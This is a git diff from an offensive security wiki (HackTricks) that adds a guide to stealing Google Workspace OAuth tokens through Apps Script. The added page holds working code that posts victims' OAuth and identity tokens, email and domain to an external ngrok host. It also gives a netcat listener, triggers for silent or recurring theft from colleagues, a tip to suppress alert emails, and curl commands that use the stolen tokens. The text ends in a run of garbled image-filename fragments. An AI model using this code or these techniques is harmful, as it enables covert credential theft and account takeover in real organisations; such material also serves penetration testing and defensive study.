+In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**:
+
+* **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions)
+* **Gmail**: To access gmail data
+* **Drive**: To access drive data
+* **Google Sheets API**: So it works with the trigger
+
+To change yourself the **needed scope**s you can go to project settings and **enable S`how "appsscript.json" manifest file in editor`.**
+
+{% code overflow="wrap" %}
+```javascript
+function getToken() {
+ var userEmail = Session.getActiveUser().getEmail();
+ var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1);
+ var oauthToken = ScriptApp.getOAuthToken();
+ var identityToken = ScriptApp.getIdentityToken();
+
+ // Data json
+ data = {
+ "oauthToken": oauthToken,
+ "identityToken": identityToken,
+ "email": userEmail,
+ "domain": domain
+ }
+
+ // Send data
+ makePostRequest(data);
+
+ // Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions
+
+ // To ask for AdminDirectory permissions
+ var pageToken = "";
+ page = AdminDirectory.Users.list({
+ domain: domain, // Use the extracted domain
+ orderBy: 'givenName',
+ maxResults: 100,
+ pageToken: pageToken
+ });
+
+ // To ask for gmail permissions
+ var threads = GmailApp.getInboxThreads(0, 10);
+
+ // To ask for drive permissions
+ var files = DriveApp.getFiles();
+}
+
+
+function makePostRequest(data) {
+ var url = 'http://5.tcp.eu.ngrok.io:12027';
+
+ var options = {
+ 'method' : 'post',
+ 'contentType': 'application/json',
+ 'payload' : JSON.stringify(data)
+ };
+
+ try {
+ UrlFetchApp.fetch(url, options);
+ } catch (e) {
+ Logger.log("Error making POST request: " + e.toString());
+ }
+}
+```
+{% endcode %}
+
+To capture the request you can just run:
+
+```bash
+ngrok tcp 4444
+nc -lv 4444 #macOS
+```
+
+Permissions requested to execute the App Script:
+
+
+
+{% hint style="warning" %}
+As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**.
+{% endhint %}
+
+### Create Trigger
+
+Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save.
+
+Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something.
+
+### Sharing
+
+In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**.
+
+As summary, if the creator and invited user are **from the same organization** the **OAuth** **token** will **belong** to the **user** accessing the file.\
+If they are from **different organizations**, the **token** will belong to the **creator of the trigger** always with **only the OAuth permissions given** when the trigger was created.
+
+{% hint style="success" %}
+* If you just generate an **Editor link to share with everybody** the App Script will be e**xecuted with the permissions of the creator** of it, so you won't get the token of any user that opens it.
+* If you **invite people outside of your organization** the **App Script is Executed with the triggers creators** permissions (stealing the creators token and not of the user that opened the document).
+{% endhint %}
+
+{% hint style="danger" %}
+* If you invite **people of your own company they won't be asked anything about the OAuth** permissions and the App Script will be executed with THEIR user permissions, stealing their tokens.
+ * An attacker could **add an App Script to a new or existing document** people of the same organization is going to open and **steal tokens from them** without them noticing!
+{% endhint %}
+
+### Abusing Shared With Me documents
+
+{% hint style="danger" %}
+* If someone external **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created).
+ * If it's someone internal it will be executed with your permissions.... just **share it with an external person and access it from the external persons email** to execute it with the creators permissions
+ * A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?)
+{% endhint %}
+
+{% hint style="success" %}
+If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created.
+{% endhint %}
+
+### Copying instead of sharing
+
+When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
+If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:**
+
+
+
+If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**.
+
+### Sharing as Web Application
+
+Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear:
+
+
+
+Followed by the **typical OAuth prompt asking** for the needed permissions.
+
+### Testing
+
+You can test a gathered token to list emails with:
+
+{% code overflow="wrap" %}
+```bash
+curl -X GET "https://www.googleapis.com/gmail/v1/users//messages" \
+-H "Authorization: Bearer "
+```
+{% endcode %}
+
+List calendar of the user:
+
+```bash
+curl -H "Authorization: Bearer $OAUTH_TOKEN" \
+ -H "Accept: application/json" \
+ "https://www.googleapis.com/calendar/v3/users/me/calendarList"
+```
+
+## App Script as Persistence
+
+It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**:
+
+Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you:
+
+
+
+{% hint style="danger" %}
+This will create a security alert email and a push message to your mobile alerting about this.
+{% endhint %}
+
+
+
+### Shared Document Unverified Prompt Bypass
+
+Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
+
+{% hint style="warning" %}
+This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it.
+
+This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document.
+{% endhint %}
+
+{% hint style="danger" %}
+This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\
+To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags).
+{% endhint %}
+
+
+
+Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
diff --git a/pentesting-cloud/workspace-security/gws-persistence.md b/pentesting-cloud/workspace-security/gws-persistence.md
index 5d9909d834..3e4d088fd5 100644
--- a/pentesting-cloud/workspace-security/gws-persistence.md
+++ b/pentesting-cloud/workspace-security/gws-persistence.md
@@ -82,8 +82,8 @@ It is pretty common for Workspace Organizations to not trust by default external
Check the following page for more information about OAuth Apps:
-{% content-ref url="gws-google-platforms-phishing.md" %}
-[gws-google-platforms-phishing.md](gws-google-platforms-phishing.md)
+{% content-ref url="gws-google-platforms-phishing/" %}
+[gws-google-platforms-phishing](gws-google-platforms-phishing/)
{% endcontent-ref %}
## Persistence via delegation
@@ -182,9 +182,11 @@ If you have a **session inside victims google account** you can browse to the **
## **Persistence via** App Scripts
-You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**.
+You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check:
-The docs mention that to use `ScriptApp.newTrigger("funcion")` you need the **scope** `script.scriptapp`, but **apparently thats not necessary** as long as you have declared some other scope.
+{% content-ref url="gws-google-platforms-phishing/gws-app-scripts.md" %}
+[gws-app-scripts.md](gws-google-platforms-phishing/gws-app-scripts.md)
+{% endcontent-ref %}
## References
diff --git a/pentesting-cloud/workspace-security/gws-post-exploitation.md b/pentesting-cloud/workspace-security/gws-post-exploitation.md
index abaf7096f0..8815fedf20 100644
--- a/pentesting-cloud/workspace-security/gws-post-exploitation.md
+++ b/pentesting-cloud/workspace-security/gws-post-exploitation.md
@@ -68,6 +68,10 @@ Some proposed ways to find all the documents:
In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user, **sensitive** **information** might be saved in here.
+### Modify App Scripts
+
+In [**https://script.google.com/**](https://script.google.com/) you can find the APP Scripts of the user.
+
## **Administrate Workspace**
In [**https://admin.google.com**/](https://admin.google.com), you might be able to modify the Workspace settings of the whole organization if you have enough permissions.
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1).png)
 (1).png)
 (1) (1).png)
 (1) (1) (1).png)
 (1) (1) (1) (1).png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)